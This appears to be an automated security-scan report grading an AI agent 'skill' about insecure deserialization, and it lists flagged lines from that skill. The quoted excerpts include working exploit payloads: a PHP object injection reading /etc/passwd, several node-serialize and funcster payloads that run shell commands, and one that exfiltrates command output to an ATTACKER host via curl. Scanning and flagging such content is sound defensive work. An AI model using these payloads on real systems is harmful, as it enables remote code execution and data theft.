deserialization-insecure
github.com/yaklang/hack-skills
Scanned Thu, 28 May 2026 17:27:02 GMT
Scan ID crawl-onhyumwutz5pdnwcgqnz2xmk · 3ms
C
SCORE 55 / 100
Verdict: Proceed with caution

1 high-severity finding.

This skill reads protected filesystem locations plus 9 other issues listed below.

0 critical · 1 high · 9 medium · 2 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 9 medium findings (6+ MEDs → C).

0 CRIT · 1 HIGH · 9 MED · 0 LOW

To reach a higher grade
  • B (target score 75)
    Resolve 4 of 9 MED (cap is 5).

  • A (target score 95)
    Resolve all 1 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high
Sensitive filesystem path referenced
The skill references a path (`/etc/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 181 · CWE-552
179 |
180 | ```text
181 | action=test&configuration=O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}
    |   ← sensitive path — credential-exfiltration vector
182 | ```
183 |
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 93 · CWE-78
91 | The vulnerability exists when `org.apache.commons.collections` (3.x) is on the classpath and the application calls `readObject()` on untrusted data.
92 |
93 | Key classes in the chain: `InvokerTransformer` → `ChainedTransformer` → `TransformedMap` → triggers `Runtime.exec()` during deserialization.
   |   ← spawns a subprocess outside declared capabilities
94 |
95 | ### Apache Shiro — rememberMe Deserialization
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 413 · CWE-78
411 |
412 | ```json
413 | {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('COMMAND')}()"}
    |   ← spawns a subprocess outside declared capabilities
414 | ```
415 |
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 419 · CWE-78
417 |
418 | ```json
419 | {"__js_function":"function(){return global.process.mainModule.require('child_process').execSync('id').toString()}"}
    |   ← spawns a subprocess outside declared capabilities
420 | ```
421 |
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 558 · CWE-78
556 | // Payload uses _$$ND_FUNC$$_ marker + IIFE:
557 |
558 | var payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'id\',function(error,stdout,stderr){console.log(stdout)});}()"}';
    |   ← spawns a subprocess outside declared capabilities
559 |
560 | // The trailing () makes it an Immediately Invoked Function Expression
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 564 · CWE-78
562 |
563 | // Full HTTP exploit (in cookie or body):
564 | {"username":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://ATTACKER/?x=$(id|base64)',function(e,o,s){});}()","email":"test@test.com"}
    |   ← spawns a subprocess outside declared capabilities
565 | ```
566 |
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 570 · CWE-78
568 | ```javascript
569 | // funcster deserializes functions via constructor.constructor pattern:
570 | {"__js_function":"function(){var net=this.constructor.constructor('return require')()('child_process');return net.execSync('id').toString();}"}
    |   ← spawns a subprocess outside declared capabilities
571 | ```
572 |
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 702 · CWE-78
700 | // Payload: IIFE (Immediately Invoked Function Expression)
701 | // The _$$ND_FUNC$$_ prefix signals a serialized function
702 | {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id',function(error,stdout,stderr){console.log(stdout)})}()"}
    |   ← spawns a subprocess outside declared capabilities
703 |
704 | // Key: the () at the end causes immediate execution upon deserialization
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-execution · line: 711 · CWE-78
709 | // Vulnerable: funcster.deepDeserialize(userInput)
710 | // Payload uses __js_function to inject via constructor chain:
711 | {"__js_function":"function(){var net=this.constructor.constructor('return this')().process.mainModule.require('child_process');return net.execSync('id').toString()}()"}
    |   ← spawns a subprocess outside declared capabilities
712 | ```
713 |
med
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
skillox.io/r/crawl-onhyumwutz5pdnwcgqnz2xmk